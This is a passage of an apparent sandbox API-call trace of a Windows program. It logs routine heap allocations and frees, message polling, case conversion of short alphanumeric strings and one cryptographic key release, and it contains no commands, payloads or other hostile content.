wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0255.011] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.011] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.011] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.011] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.011] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.011] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0255.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.012] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.012] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.012] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.012] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.012] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.012] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.012] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0255.013] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.013] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.013] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.013] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.013] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.014] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.014] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.022] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.022] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.022] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0255.022] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.022] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0255.023] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.023] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.023] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.023] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.023] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.023] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.023] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0255.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0255.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0255.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.024] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0255.024] CryptDestroyKey (hKey=0xaa5760) returned 1 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0255.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0255.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0255.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0255.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0255.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0255.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0255.026] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0255.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0255.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0255.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0255.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.027] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.028] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0255.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.028] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.029] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.029] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.029] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.030] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.031] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.031] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.031] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.031] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.032] 